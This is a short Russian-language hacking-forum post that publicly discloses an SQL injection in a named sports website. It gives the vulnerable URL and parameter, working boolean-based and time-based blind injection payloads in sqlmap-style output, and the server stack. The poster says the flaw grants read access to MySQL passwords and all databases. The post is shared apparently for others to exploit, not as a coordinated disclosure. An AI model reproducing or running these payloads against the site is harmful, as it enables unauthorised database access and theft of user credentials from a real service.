30.10.2019, 23:52
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255
Репутация:
2
|
|
fantasycruncher.com
сайт спортивной тематики, права на чтение паролей MySQL и всех бд
Код:
https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
---
web application technology: PHP 5.6.29, Nginx 1.10.1
back-end DBMS: MySQL 5 (MariaDB fork)
|
|
|